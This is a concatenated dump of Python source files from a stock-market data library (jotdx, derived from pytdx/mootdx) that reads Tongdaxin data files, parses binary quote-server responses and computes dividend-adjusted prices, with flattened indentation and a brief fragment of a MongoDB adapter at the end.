from pytdx.reader.history_financial_reader import HistoryFinancialReader
import pandas as pd
# let pandas display all rows and columns
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
Help_Text = '''
数据文件格式,
- daily 代表日K线
- ex_daily 代表扩展行情的日线
- min 代表5分钟或者1分钟线
- lc 代表lc1, lc5格式的分钟线
- gbbq 股本变迁文件
- block 读取板块股票列表文件
- customblock 读取自定义板块列表
- history_financial 或者 hf 历史财务信息 如 gpcw20170930.dat 或者 gpcw20170930.zip
'''
@click.command()
@click.argument("input", type=click.Path(exists=True))
@click.option("-o", '--output', help="")
@click.option("-d", "--datatype", default="daily", help=Help_Text)
def main(input, output, datatype):
"""
通达信数据文件读取
"""
if datatype == 'daily':
reader = TdxDailyBarReader()
elif datatype == 'ex_daily':
reader = TdxExHqDailyBarReader()
elif datatype == 'lc':
reader = TdxLCMinBarReader()
elif datatype == 'gbbq':
reader = GbbqReader()
elif datatype == 'block':
reader = BlockReader()
elif datatype == 'customblock':
reader = CustomerBlockReader()
elif datatype == 'history_financial' or datatype == 'hf':
reader = HistoryFinancialReader()
else:
reader = TdxMinBarReader()
try:
df = reader.get_df(input)
if output:
click.echo("写入到文件 : " + output)
df.to_csv(output)
else:
print(df)
except Exception as e:
print(str(e))
if __name__ == '__main__':
main()
```
#### File: jotdx/contrib/fuquan.py
```python
import pandas as pd
from mootdx.quotes import Quotes
def calc_fuquan_use_fenhong(df, df_fenhong):
"""获取复权后的历史数据, 用分红表来计算复权 , 前复权
df: 日k线
df_fenhong: 分红表
return: df"""
# 日期早的在前面
# 经过测试, 前复权结果与同花顺,通达信的计算相同
df_fenhong = df_fenhong.sort_index(by=2)
for i in range(len(df_fenhong)):
gu, money, date = df_fenhong.irow(i)
if len(df.ix[:date]) < 2:
continue
        # map to the previous available date in df
date = agl.df_get_pre_date(df, date)
if money > 0:
money = money * 0.1
df['o'].ix[:date] -= money
df['h'].ix[:date] -= money
df['c'].ix[:date] -= money
df['l'].ix[:date] -= money
if gu > 0:
# x = cur / (1+y/10)
gu = 1 + gu / 10
df['o'].ix[:date] /= gu
df['h'].ix[:date] /= gu
df['c'].ix[:date] /= gu
df['l'].ix[:date] /= gu
return df
def make_fq(symbol='', method='00'):
client = Quotes.factory(market='std')
data = client.bars(symbol=symbol)
xdxr = client.xdxr(symbol=symbol).query('category==1')
if method:
return make_qfq(data, xdxr, method)
return data
# field glossary: fenhong = cash dividend, peigu = rights-issue shares,
# peigujia = rights-issue price, songzhuangu = bonus/converted shares
def make_qfq(data, xdxr, fq_type='01'):
"""使用数据库数据进行复权"""
# 过滤其他,只留除权信息
xdxr = xdxr.query('category==1')
# data = data.assign(if_trade=1)
if len(xdxr) > 0:
        # ex-rights info exists: merge the original data with the ex-rights data
# data = pd.concat([data, xdxr.loc[data.index[0]:data.index[-1], ['category']]], axis=1)
# data['if_trade'].fillna(value=0, inplace=True)
data = data.fillna(method='ffill')
# present bonus price rationed
# songzhuangu fenhong peigujia peigu
data = pd.concat([data, xdxr.loc[data.index[0]:data.index[-1], ['fenhong', 'peigu', 'peigujia', 'songzhuangu']]], axis=1)
else:
        # no ex-rights info
data = pd.concat([data, xdxr.loc[:, ['fenhong', 'peigu', 'peigujia', 'songzhuangu']]], axis=1)
    # clean the data
data = data.fillna(0)
if fq_type == '01':
        # compute preclose (TODO: key step)
# for key,val in ea.iterrows():
# date = key - datetime.timedelta(days=1)
# for field in df.columns.values:
# if field != 'volume' and field != 'amount':
# df.iloc[date:, field] -= val.bonus/10
# df.iloc[date:, field] += val.price*(val.rationed/10)
# df.iloc[date:, field] /= 1 + val.present/10 + val.rationed/10
# -= val.bonus / 10 == @todo
df1 = (data['close'].shift(1) * 10 - data['fenhong'] + data['peigu'] * data['peigujia'])
df2 = (10 + data['peigu'] + data['songzhuangu'])
data['preclose'] = (data['close'].shift(1) * 10 - data['fenhong'] + data['peigu'] * data['peigujia']) / (10 + data['peigu'] + data['songzhuangu'])
        # compute the adj (adjustment) factor
data['adj'] = (data['preclose'].shift(-1) / data['close']).fillna(1)[::-1].cumprod()
else:
        # compute preclose (TODO: key step)
data['preclose'] = (data['close'].shift(1) * 10 - data['fenhong'] + data['peigu'] * data['peigujia']) / (10 + data['peigu'] + data['songzhuangu'])
        # compute the adj (adjustment) factor
data['adj'] = (data['close'] / data['preclose'].shift(-1)).cumprod().shift(1).fillna(1)
    # compute adjusted prices
for field in data.columns.values:
if field in ('open', 'close', 'high', 'low', 'preclose'):
data[field] = data[field] * data['adj']
    # clean the data and return the result
return data.query('open != 0').drop(['fenhong', 'peigu', 'peigujia', 'songzhuangu', ], axis=1)
# def make_hfq(bfq_data, xdxr_data):
# """使用数据库数据进行复权"""
# info = xdxr_data.query('category==1')
# bfq_data = bfq_data.assign(if_trade=1)
#
# if len(info) > 0:
# # 合并数据
# data = pd.concat([bfq_data, info.loc[bfq_data.index[0]:bfq_data.index[-1], ['category']]], axis=1)
# data['if_trade'].fillna(value=0, inplace=True)
#
# data = data.fillna(method='ffill')
# data = pd.concat([data, info.loc[bfq_data.index[0]:bfq_data.index[-1], ['fenhong', 'peigu', 'peigujia', 'songzhuangu']]], axis=1)
# else:
# data = pd.concat([bfq_data, info.loc[:, ['category', 'fenhong', 'peigu', 'peigujia', 'songzhuangu']]], axis=1)
#
# data = data.fillna(0)
#
# # 生成 preclose todo 关键位置
# data['preclose'] = (data['close'].shift(1) * 10 - data['fenhong'] + data['peigu'] * data['peigujia']) / (10 + data['peigu'] + data['songzhuangu'])
# data['adj'] = (data['close'] / data['preclose'].shift(-1)).cumprod().shift(1).fillna(1)
#
# # 计算复权价格
# for field in data.columns.values:
# if field in ('open', 'close', 'high', 'low', 'preclose'):
# data[field] = data[field] * data['adj']
#
# # data['open'] = data['open'] * data['adj']
# # data['high'] = data['high'] * data['adj']
# # data['low'] = data['low'] * data['adj']
# # data['close'] = data['close'] * data['adj']
# # data['preclose'] = data['preclose'] * data['adj']
#
# # 不计算 交易量
# # data['volume'] = data['volume'] / data['adj'] if 'volume' in data.columns else data['vol'] / data['adj']
#
# try:
# data['high_limit'] = data['high_limit'] * data['adj']
# data['low_limit'] = data['high_limit'] * data['adj']
# except:
# pass
#
# return data.query('if_trade==1 and open != 0').drop(['fenhong', 'peigu', 'peigujia', 'songzhuangu', 'if_trade', 'category'], axis=1)
```
#### File: jotdx/crawler/history_financial_crawler.py
```python
from struct import calcsize, unpack
from jotdx.crawler.base_crawler import BaseCralwer
import shutil
import tempfile
import random
import os
import six
import pandas as pd  # to_df below builds a DataFrame; without this import it fails when the module is imported elsewhere
if six.PY2:
import zipfile
"""
https://github.com/rainx/jotdx/issues/133
Interface for fetching historical financial data; based on the approach and code from @datochan in the issue above.
"""
class HistoryFinancialListCrawler(BaseCralwer):
def __init__(self):
self.mode = "content"
def get_url(self, *args, **kwargs):
return "https://gitee.com/yutiansut/QADATA/raw/master/financial/content.txt"
def get_content(self, reporthook=None, path_to_download=None, proxies=None, chunksize=1024 * 50, *args, **kwargs):
from jotdx.hq import TdxHq_API
api = TdxHq_API()
api.need_setup = False
# calc.tdx.com.cn, calc2.tdx.com.cn
with api.connect(ip="192.168.3.11"):
content = api.get_report_file_by_size("tdxfin/gpcw.txt")
if path_to_download is None:
download_file = tempfile.NamedTemporaryFile(delete=True)
else:
download_file = open(path_to_download, 'wb')
download_file.write(content)
download_file.seek(0)
return download_file
def parse(self, download_file, *args, **kwargs):
content = download_file.read()
content = content.decode("utf-8")
def list_to_dict(l):
return {
'filename': l[0],
'hash': l[1],
'filesize': int(l[2])
}
result = [list_to_dict(l) for l in [line.strip().split(",") for line in content.strip().split('\n')]]
return result
class HistoryFinancialCrawler(BaseCralwer):
def __init__(self):
self.mode = "content"
def get_url(self, *args, **kwargs):
if 'filename' in kwargs:
filename = kwargs['filename']
else:
raise Exception("Param filename is not set")
return "http://data.yutiansut.com/{}".format(filename)
def get_content(self, reporthook=None, path_to_download=None, proxies=None, chunksize=1024 * 50, *args, **kwargs):
if 'filename' in kwargs:
filename = kwargs['filename']
else:
raise Exception("Param filename is not set")
if "filesize" in kwargs:
filesize = kwargs["filesize"]
else:
filesize = 0
from jotdx.hq import TdxHq_API
api = TdxHq_API()
api.need_setup = False
# calc.tdx.com.cn, calc2.tdx.com.cn
with api.connect(ip="192.168.3.11"):
content = api.get_report_file_by_size("tdxfin/" + filename, filesize=filesize, reporthook=reporthook)
if path_to_download is None:
download_file = tempfile.NamedTemporaryFile(delete=True)
else:
download_file = open(path_to_download, 'wb')
download_file.write(content)
download_file.seek(0)
return download_file
def parse(self, download_file, *args, **kwargs):
header_pack_format = '<1hI1H3L'
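        # Assumed header layout (matching the unpack below): int16 marker,
        # uint32 report date, uint16 number of stocks, then three uint32 values,
        # the last of which is the per-stock report size in bytes.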
if download_file.name.endswith('.zip'):
tmpdir_root = tempfile.gettempdir()
subdir_name = "pytdx_" + str(random.randint(0, 1000000))
tmpdir = os.path.join(tmpdir_root, subdir_name)
shutil.rmtree(tmpdir, ignore_errors=True)
os.makedirs(tmpdir)
if six.PY2:
with zipfile.ZipFile(download_file.name, 'r') as zf:
zf.extractall(tmpdir)
else:
shutil.unpack_archive(download_file.name, extract_dir=tmpdir)
# only one file endswith .dat should be in zip archives
datfile = None
for _file in os.listdir(tmpdir):
if _file.endswith(".dat"):
datfile = open(os.path.join(tmpdir, _file), "rb")
if datfile is None:
raise Exception("no dat file found in zip archive")
else:
datfile = download_file
header_size = calcsize(header_pack_format)
stock_item_size = calcsize("<6s1c1L")
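        # Each index entry is a 6-byte stock code, one byte (unused here) and a
        # uint32 file offset (foa) pointing at that stock's report block.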
data_header = datfile.read(header_size)
stock_header = unpack(header_pack_format, data_header)
max_count = stock_header[2]
report_date = stock_header[1]
report_size = stock_header[4]
report_fields_count = int(report_size / 4)
report_pack_format = '<{}f'.format(report_fields_count)
results = []
for stock_idx in range(0, max_count):
datfile.seek(header_size + stock_idx * calcsize("<6s1c1L"))
si = datfile.read(stock_item_size)
stock_item = unpack("<6s1c1L", si)
code = stock_item[0].decode("utf-8")
foa = stock_item[2]
datfile.seek(foa)
info_data = datfile.read(calcsize(report_pack_format))
cw_info = unpack(report_pack_format, info_data)
one_record = (code, report_date) + cw_info
results.append(one_record)
if download_file.name.endswith('.zip'):
datfile.close()
shutil.rmtree(tmpdir, ignore_errors=True)
return results
def to_df(self, data):
if len(data) == 0:
return None
        total_length = len(data[0])
        col = ['code', 'report_date']
        length = total_length - 2
for i in range(0, length):
col.append("col" + str(i + 1))
df = pd.DataFrame(data=data, columns=col)
df.set_index('code', inplace=True)
return df
if __name__ == '__main__':
import pandas as pd
from jotdx.crawler.base_crawler import demo_reporthook
crawler = HistoryFinancialListCrawler()
#
list_data = crawler.fetch_and_parse(reporthook=demo_reporthook)
df = pd.DataFrame(data=list_data)
print(df["filename"])
print(df["filename"].str.contains("gpcw20190630.zip").any())
    # read one of the files
# filename = list_data[1]['filename']
# filesize = list_data[1]["filesize"]
# datacrawler = HistoryFinancialCrawler()
# pd.set_option('display.max_columns', None)
# result = datacrawler.fetch_and_parse(reporthook=demo_reporthook, filename=filename, filesize=filesize, path_to_download="/tmp/tmpfile.zip")
# print(result)
# with open(r"/tmp/tmpfile.zip", "rb") as fp:
# result = datacrawler.parse(download_file=fp)
# print(datacrawler.to_df(data=result))
```
#### File: jotdx/jotdx/logger.py
```python
import sys
from loguru import logger
logger.remove()
def getLogger(quiet=None, verbose=None) -> logger: # noqa
level = ('INFO', 'DEBUG')[bool(verbose)]
logger.remove()
quiet or logger.add(sys.stderr, level=level)
return logger
def reset(verbose: int = 0, **kwargs) -> logger: # noqa
"""
    Reset the logger level.
    :param verbose: verbosity level 0 - 3
:param kwargs:
:return:
"""
levels = ['WARNING', 'INFO', 'DEBUG', 'TRACE']
    level0 = levels[-1] if verbose >= len(levels) else levels[verbose]
logger.remove()
logger.add(sys.stdout, level=level0, filter='mootdx')
# logger.add(sys.stdout, filter=lambda record: "message" in record["extra"], format="<level>{message}</level>")
return logger
def setup(verbose: int = 0, **kwargs) -> logger: # noqa
return reset(verbose=verbose, **kwargs)
def config(verbose: int = 0, **kwargs) -> logger: # noqa
return reset(verbose=verbose, **kwargs)
```
#### File: jotdx/parser/base.py
```python
from jotdx.log import DEBUG, log
import zlib
import struct
import sys
import datetime
try:
import cython
if cython.compiled:
def buffer(x):
return x
except ImportError:
pass
class SocketClientNotReady(Exception):
pass
class SendPkgNotReady(Exception):
pass
class SendRequestPkgFails(Exception):
pass
class ResponseHeaderRecvFails(Exception):
pass
class ResponseRecvFails(Exception):
pass
RSP_HEADER_LEN = 0x10
class BaseParser(object):
def __init__(self, client, lock=None):
self.client = client
self.data = None
self.send_pkg = None
self.rsp_header = None
self.rsp_body = None
self.rsp_header_len = RSP_HEADER_LEN
self.category = None
self.market = None
self.code = None
if lock:
self.lock = lock
else:
self.lock = None
def setParams(self, *args, **xargs):
"""
        Build the request packet
:return:
"""
pass
def parseResponse(self, body_buf):
pass
def setup(self):
pass
def call_api(self):
if self.lock:
with self.lock:
log.debug("sending thread lock api call")
result = self._call_api()
else:
result = self._call_api()
return result
def _call_api(self):
self.setup()
if not (self.client):
raise SocketClientNotReady("socket client not ready")
if not (self.send_pkg):
raise SendPkgNotReady("send pkg not ready")
nsended = self.client.send(self.send_pkg)
self.client.send_pkg_num += 1
self.client.send_pkg_bytes += nsended
self.client.last_api_send_bytes = nsended
if self.client.first_pkg_send_time is None:
self.client.first_pkg_send_time = datetime.datetime.now()
if DEBUG:
log.debug("send package:" + str(self.send_pkg))
if nsended != len(self.send_pkg):
log.debug("send bytes error")
raise SendRequestPkgFails("send fails")
else:
head_buf = self.client.recv(self.rsp_header_len)
if DEBUG:
log.debug("recv head_buf:" + str(head_buf) + " |len is :" + str(len(head_buf)))
if len(head_buf) == self.rsp_header_len:
self.client.recv_pkg_num += 1
self.client.recv_pkg_bytes += self.rsp_header_len
_, _, _, zipsize, unzipsize = struct.unpack("<IIIHH", head_buf)
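                # 16-byte response header: three uint32 fields that are ignored
                # here, followed by the compressed (zipsize) and uncompressed
                # (unzipsize) body lengths.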
if DEBUG:
log.debug("zip size is: " + str(zipsize))
body_buf = bytearray()
last_api_recv_bytes = self.rsp_header_len
while True:
buf = self.client.recv(zipsize)
len_buf = len(buf)
self.client.recv_pkg_num += 1
self.client.recv_pkg_bytes += len_buf
last_api_recv_bytes += len_buf
body_buf.extend(buf)
if not (buf) or len_buf == 0 or len(body_buf) == zipsize:
break
self.client.last_api_recv_bytes = last_api_recv_bytes
if len(buf) == 0:
log.debug("接收数据体失败服务器断开连接")
raise ResponseRecvFails("接收数据体失败服务器断开连接")
if zipsize == unzipsize:
log.debug("不需要解压")
else:
log.debug("需要解压")
if sys.version_info[0] == 2:
unziped_data = zlib.decompress(buffer(body_buf))
else:
unziped_data = zlib.decompress(body_buf)
body_buf = unziped_data
                ## decompressed
if DEBUG:
log.debug("recv body: ")
log.debug(body_buf)
return self.parseResponse(body_buf)
else:
log.debug("head_buf is not 0x10")
raise ResponseHeaderRecvFails("head_buf is not 0x10 : " + str(head_buf))
```
#### File: jotdx/parser/ex_get_minute_time_data.py
```python
from jotdx.parser.base import BaseParser
from jotdx.helper import get_datetime, get_volume, get_price
from collections import OrderedDict
import struct
"""
tradex sample output
7. minute-by-minute (fenshi) quote query...
time      price        avg_price    volume  amount
09:30 3706.199951 3706.199951 27 13336
09:31 3705.199951 3705.910400 11 13335
09:32 3704.600098 3705.473633 19 13328
09:33 3701.399902 3704.717041 13 13324
09:34 3700.800049 3704.556152 3 13323
09:35 3699.800049 3703.379395 24 13321
09:36 3695.800049 3702.544922 12 13319
09:37 3700.600098 3702.510010 2 13318
"""
class GetMinuteTimeData(BaseParser):
def setParams(self, market, code):
pkg = bytearray.fromhex("01 07 08 00 01 01 0c 00 0c 00 0b 24")
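        # fixed 12-byte request preamble (raw protocol bytes) above; the market
        # id and the zero-padded 9-byte security code are appended below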
code = code.encode("utf-8")
pkg.extend(struct.pack('<B9s', market, code))
self.send_pkg = pkg
def parseResponse(self, body_buf):
pos = 0
market, code, num = struct.unpack('<B9sH', body_buf[pos: pos+12])
pos += 12
result = []
for i in range(num):
(raw_time, price, avg_price, volume, amount) = struct.unpack("<HffII", body_buf[pos: pos+18])
pos += 18
hour = raw_time // 60
minute = raw_time % 60
result.append(OrderedDict([
("hour", hour),
("minute", minute),
("price", price),
("avg_price", avg_price),
("volume", volume),
("open_interest", amount),
]))
return result
```
#### File: jotdx/parser/get_history_transaction_data.py
```python
from jotdx.parser.base import BaseParser
from jotdx.helper import get_datetime, get_volume, get_price, get_time
from collections import OrderedDict
import struct
import six
class GetHistoryTransactionData(BaseParser):
def setParams(self, market, code, start, count, date):
if type(code) is six.text_type:
code = code.encode("utf-8")
        if (type(date) is six.text_type) or (type(date) is six.binary_type):
date = int(date)
pkg = bytearray.fromhex(u'0c 01 30 01 00 01 12 00 12 00 b5 0f')
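        # payload appended below: uint32 date (YYYYMMDD), uint16 market,
        # 6-byte code, uint16 start offset, uint16 record count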
pkg.extend(struct.pack("<IH6sHH", date, market, code, start, count))
self.send_pkg = pkg
def parseResponse(self, body_buf):
pos = 0
(num, ) = struct.unpack("<H", body_buf[:2])
pos += 2
ticks = []
# skip 4 bytes
pos += 4
last_price = 0
for i in range(num):
### ?? get_time
# \x80\x03 = 14:56
hour, minute, pos = get_time(body_buf, pos)
price_raw, pos = get_price(body_buf, pos)
vol, pos = get_price(body_buf, pos)
buyorsell, pos = get_price(body_buf, pos)
_, pos = get_price(body_buf, pos)
last_price = last_price + price_raw
tick = OrderedDict(
[
("time", "%02d:%02d" % (hour, minute)),
("price", float(last_price)/100),
("vol", vol),
("buyorsell", buyorsell),
]
)
ticks.append(tick)
return ticks
if __name__ == '__main__':
from jotdx.hq import TdxHq_API
api = TdxHq_API()
with api.connect():
print(api.to_df(api.get_history_transaction_data(0, '000001', 0, 10, 20170811)))
```
#### File: jotdx/parser/get_security_list.py
```python
from jotdx.parser.base import BaseParser
from jotdx.helper import get_datetime, get_volume, get_price
from collections import OrderedDict
import struct
class GetSecurityList(BaseParser):
def setParams(self, market, start):
pkg = bytearray.fromhex(u'0c 01 18 64 01 01 06 00 06 00 50 04')
pkg_param = struct.pack("<HH", market, start)
pkg.extend(pkg_param)
self.send_pkg = pkg
def parseResponse(self, body_buf):
pos = 0
(num, ) = struct.unpack("<H", body_buf[:2])
pos += 2
stocks = []
for i in range(num):
# b'880023d\x00\xd6\xd0\xd0\xa1\xc6\xbd\xbe\xf9.9\x04\x00\x02\x9a\x99\x8cA\x00\x00\x00\x00'
# 880023 100 中小平均 276782 2 17.575001 0 80846648
one_bytes = body_buf[pos: pos + 29]
(code, volunit,
name_bytes, reversed_bytes1, decimal_point,
pre_close_raw, reversed_bytes2) = struct.unpack("<6sH8s4sBI4s", one_bytes)
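            # the 29-byte record above unpacks as: 6-byte code, uint16 volunit,
            # 8-byte GBK name, 4 reserved bytes, uint8 decimal_point,
            # uint32 raw pre_close and 4 more reserved bytes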
code = code.decode("utf-8")
name = name_bytes.decode("gbk",errors = "ignore").rstrip("\x00")
pre_close = get_volume(pre_close_raw)
pos += 29
one = OrderedDict(
[
('code', code),
('volunit', volunit),
('decimal_point', decimal_point),
('name', name),
('pre_close', pre_close),
]
)
stocks.append(one)
return stocks
```
#### File: jotdx/utils/adjust.py
```python
import datetime
import time
from pathlib import Path
import httpx
import pandas as pd
import simplejson as json
from tenacity import retry
from tenacity import stop_after_attempt
from tenacity import wait_fixed
from jotdx.consts import return_last_value
@retry(wait=wait_fixed(2), retry_error_callback=return_last_value, stop=stop_after_attempt(5))
def fq_factor(method: str, symbol: str) -> pd.DataFrame:
zh_sina_a_stock_hfq_url = 'https://finance.sina.com.cn/realstock/company/{}/hfq.js'
zh_sina_a_stock_qfq_url = 'https://finance.sina.com.cn/realstock/company/{}/qfq.js'
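    # Both endpoints appear to return a small JS assignment ("var ... = {...}");
    # the JSON object after the '=' carries the date/factor records parsed below.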
client = httpx.Client(verify=False)
if method == 'hfq':
res = client.get(zh_sina_a_stock_hfq_url.format(symbol))
hfq_factor_df = pd.DataFrame(json.loads(res.text.split('=')[1].split('\n')[0])['data'])
if hfq_factor_df.shape[0] == 0:
raise ValueError('sina hfq factor not available')
hfq_factor_df.columns = ['date', 'hfq_factor']
hfq_factor_df.index = pd.to_datetime(hfq_factor_df.date)
del hfq_factor_df['date']
hfq_factor_df.reset_index(inplace=True)
# hfq_factor_df = hfq_factor_df.set_index('date')
return hfq_factor_df
else:
res = client.get(zh_sina_a_stock_qfq_url.format(symbol))
qfq_factor_df = pd.DataFrame(json.loads(res.text.split('=')[1].split('\n')[0])['data'])
if qfq_factor_df.shape[0] == 0:
            raise ValueError('sina qfq factor not available')
qfq_factor_df.columns = ['date', 'qfq_factor']
qfq_factor_df.index = pd.to_datetime(qfq_factor_df.date)
del qfq_factor_df['date']
qfq_factor_df.reset_index(inplace=True)
# qfq_factor_df = qfq_factor_df.set_index('date')
return qfq_factor_df
def get_xdxr(symbol, client):
from mootdx import get_config_path
cache_file = Path(get_config_path(f'xdxr/{symbol}.plk'))
cache_file.parent.mkdir(exist_ok=True)
    # check whether the cached file exists and was modified today
today = time.mktime(datetime.date.today().timetuple())
if cache_file.is_file() and cache_file.stat().st_mtime > today:
xdxr = pd.read_pickle(cache_file)
else:
xdxr = client.xdxr(symbol=symbol)
xdxr.to_pickle(cache_file)
return xdxr
def to_adjust(temp_df, symbol=None, adjust=None, client=None):
from mootdx.tools.reversion import reversion
xdxr_data = get_xdxr(symbol=symbol, client=client)
return reversion(temp_df, xdxr_data, adjust)
def to_adjust2(temp_df, symbol=None, adjust=None):
# zh_sina_a_stock_hfq_url = "https://finance.sina.com.cn/realstock/company/{}/hfq.js"
# zh_sina_a_stock_qfq_url = "https://finance.sina.com.cn/realstock/company/{}/qfq.js"
temp_df['volume'] = temp_df['vol']
temp_df['date'] = pd.to_datetime(temp_df[['year', 'month', 'day']])
temp_df = temp_df.set_index('date')
if adjust == 'hfq':
# res = requests.get(zh_sina_a_stock_hfq_url.format(symbol))
# hfq_factor_df = pd.DataFrame(eval(res.text.split("=")[1].split("\n")[0])["data"])
# hfq_factor_df.columns = ["date", "hfq_factor"]
# hfq_factor_df.index = pd.to_datetime(hfq_factor_df.date)
hfq_factor_df = fq_factor(symbol=symbol, method=adjust)
del hfq_factor_df['date']
temp_df = pd.merge(temp_df, hfq_factor_df, left_index=True, right_index=True, how='outer')
temp_df.fillna(method='ffill', inplace=True)
temp_df = temp_df.astype(float)
temp_df.dropna(inplace=True)
temp_df.drop_duplicates(subset=['open', 'high', 'low', 'close', 'volume'], inplace=True)
for field in ['open', 'high', 'low', 'close']:
temp_df[field] = round(temp_df[field] * temp_df['hfq_factor'], 2)
temp_df = temp_df.iloc[:, :-1]
# temp_df = temp_df[start_date:end_date]
temp_df.dropna(inplace=True)
temp_df.reset_index(inplace=True)
return temp_df
if adjust == 'qfq':
# res = requests.get(zh_sina_a_stock_qfq_url.format(symbol))
# qfq_factor_df = pd.DataFrame(eval(res.text.split("=")[1].split("\n")[0])["data"])
# qfq_factor_df.columns = ["date", "qfq_factor"]
# qfq_factor_df.index = pd.to_datetime(qfq_factor_df.date)
qfq_factor_df = fq_factor(symbol=symbol, method=adjust)
qfq_factor_df = qfq_factor_df.set_index('date')
# del qfq_factor_df["date"]
temp_df = pd.merge(temp_df, qfq_factor_df, left_index=True, right_index=True, how='outer')
temp_df.fillna(method='ffill', inplace=True)
# temp_df = temp_df.astype(float)
for field in ['open', 'high', 'low', 'close', 'volume', 'qfq_factor']:
temp_df[field] = temp_df[field].astype(float)
temp_df.dropna(inplace=True)
temp_df.drop_duplicates(subset=['open', 'high', 'low', 'close', 'volume'], inplace=True)
for field in ['open', 'high', 'low', 'close']:
temp_df[field] = round(temp_df[field] / temp_df['qfq_factor'], 2)
temp_df = temp_df.iloc[:, :-1]
temp_df.dropna(inplace=True)
temp_df.reset_index(inplace=True)
print(temp_df)
return temp_df
return temp_df
```
#### File: jotdx/utils/__init__.py
```python
import hashlib
import pandas as pd
from pandas import DataFrame
from pathlib import Path
from struct import calcsize
from struct import unpack
from tqdm import tqdm
from jotdx.consts import MARKET_BJ
from jotdx.consts import MARKET_SH
from jotdx.consts import MARKET_SZ
from jotdx.logger import logger
def get_stock_markets(symbols=None):
results = []
assert isinstance(symbols, list), 'stock code need list type'
if isinstance(symbols, list):
for symbol in symbols:
results.append([get_stock_market(symbol, string=False), symbol.strip('sh').strip('sz')])
return results
def get_stock_market(symbol='', string=False):
""" 判断股票ID对应的证券市场匹配规则
['50', '51', '60', '90', '110'] 为 sh
['00', '12','13', '18', '15', '16', '18', '20', '30', '39', '115'] 为 sz
['5', '6', '9'] 开头的为 sh, 其余为 sz
:param string: False 返回市场ID,否则市场缩写名称
:param symbol: 股票ID, 若以 'sz', 'sh' 开头直接返回对应类型,否则使用内置规则判断
:return 'sh' or 'sz'
"""
assert isinstance(symbol, str), 'stock code need str type'
market = 'sh'
if symbol.startswith(('sh', 'sz', 'SH', 'SZ')):
market = symbol[:2].lower()
elif symbol.startswith(('50', '51', '60', '68', '90', '110', '113', '132', '204')):
market = 'sh'
elif symbol.startswith(('00', '12', '13', '18', '15', '16', '18', '20', '30', '39', '115', '1318')):
market = 'sz'
elif symbol.startswith(('5', '6', '9', '7')):
market = 'sh'
elif symbol.startswith(('4', '8')):
market = 'bj'
if string is False:
if market == 'sh':
market = MARKET_SH
if market == 'sz':
market = MARKET_SZ
if market == 'bj':
market = MARKET_BJ
logger.debug(f'market=>{market}')
return market
def gpcw(filepath):
cw_file = open(filepath, 'rb')
header_size = calcsize('<3h1H3L')
stock_item_size = calcsize('<6s1c1L')
data_header = cw_file.read(header_size)
stock_header = unpack('<3h1H3L', data_header)
max_count = stock_header[3]
for idx in range(0, max_count):
cw_file.seek(header_size + idx * calcsize('<6s1c1L'))
si = cw_file.read(stock_item_size)
stock_item = unpack('<6s1c1L', si)
code = stock_item[0].decode()
foa = stock_item[2]
cw_file.seek(foa)
info_data = cw_file.read(calcsize('<264f'))
cw_info = unpack('<264f', info_data)
logger.debug(f'{code}, {cw_info}')
return code, cw_info
def md5sum(downfile):
"""
    MD5 hash of a file
    :param downfile: file path
:return: mixed
"""
try:
md5_l = hashlib.md5()
md5_l.update(Path(downfile).read_bytes())
return md5_l.hexdigest()
except (IOError, FileNotFoundError) as e:
logger.error(f'无法读取文件: {downfile}')
logger.debug(e)
return None
def to_data(v, **kwargs):
"""
    Convert a value to a pd.DataFrame
:param v: mixed
:return: pd.DataFrame
"""
symbol = kwargs.get('symbol')
adjust = kwargs.get('adjust', None)
client = kwargs.get('client', None)
if adjust in ['01', 'qfq', 'before']:
adjust = 'qfq'
elif adjust in ['02', 'hfq', 'after']:
adjust = 'hfq'
else:
adjust = None
    # empty value
if not v:
return pd.DataFrame(data=[])
# DataFrame
if isinstance(v, DataFrame):
result = v
    # list
elif isinstance(v, list):
result = pd.DataFrame(data=v) if len(v) else None
    # dict
elif isinstance(v, dict):
result = pd.DataFrame(data=[v])
    # anything else: empty DataFrame
else:
result = pd.DataFrame(data=[])
if adjust and adjust in ['qfq', 'hfq'] and symbol:
from jotdx.utils.adjust import to_adjust
result['code'] = symbol
result = to_adjust(result, symbol=symbol, client=client, adjust=adjust)
if 'datetime' in result.columns:
result.index = pd.to_datetime(result.datetime)
elif 'date' in result.columns:
result.index = pd.to_datetime(result.date)
if 'vol' in result.columns:
result['volume'] = result.vol
return result
def to_file(df, filename=None):
"""
根据扩展名输出文件
:param df: pd.DataFrame
:param filename: 要输出的文件,支持 csv, xlsx, xls, json, h5
:return: bool
"""
if filename is None or df is None:
return None
path_name = Path(filename).parent
extension = Path(filename).suffix
    # create the directory if it does not exist
Path(path_name).is_dir() or Path(path_name).mkdir(parents=True)
# methods = {'to_json': ['.json']}
# method = [k for k, v in methods if extension in v][0]
# getattr(pd, method)(filename)
if extension == '.csv':
return df.to_csv(filename, encoding='utf-8', index=False)
if extension == '.xlsx' or extension == '.xls':
# openpyxl, xlwt
return df.to_excel(filename, index=False)
if extension == '.h5':
# tables
return df.to_hdf(filename, 'df', index=False)
if extension == '.json':
return df.to_json(filename, orient='records')
return None
class TqdmUpTo(tqdm):
"""
Provides `update_to(n)` which uses `tqdm.update(delta_n)`.
"""
total: object = 0
def update_to(self, downloaded=0, total_size=None):
"""
b : int, optional
Number of blocks transferred so far [default: 1].
bsize : int, optional
Size of each block (in tqdm units) [default: 1].
tsize : int, optional
Total size (in tqdm units). If [default: None] remains unchanged.
"""
if total_size is not None:
self.total = total_size
self.update(downloaded - self.n) # will also set self.n = b * bsize
def get_config_path(config='config.json'):
"""
    Get the configuration file path
    :param config: configuration file name
:return: filename
"""
filename = Path.home() / '.mootdx' / config
pathname = Path(filename).parent
Path(pathname).exists() or Path(pathname).mkdir(parents=True)
# Path(filename).exists() or Path(filename).write_text('None')
return str(filename)
FREQUENCY = ['5m', '15m', '30m', '1h', 'days', 'week', 'mon', 'ex_1m', '1m', 'day', '3mon', 'year']
def get_frequency(frequency) -> int:
# FREQUENCY = ['5m', '15m', '30m', '1h', 'day', 'week', 'mon', '1m', '1m', 'day', '3mon', 'year']
try:
if isinstance(frequency, str):
frequency = FREQUENCY.index(frequency)
except ValueError:
frequency = 0
return frequency
``` |
{
"source": "jojoquant/vnpy_jomongodb",
"score": 2
} |
#### File: vnpy_jomongodb/vnpy_jomongodb/mongo.py
```python
import numpy as np
import pandas as pd
from datetime import datetime
from typing import Union, List
from vnpy_mongodb import Database
from vnpy.trader.constant import Exchange, Interval
class JoMongodbDatabase(Database):
def __init__(self) -> None:
super(JoMongodbDatabase, self).__init__()
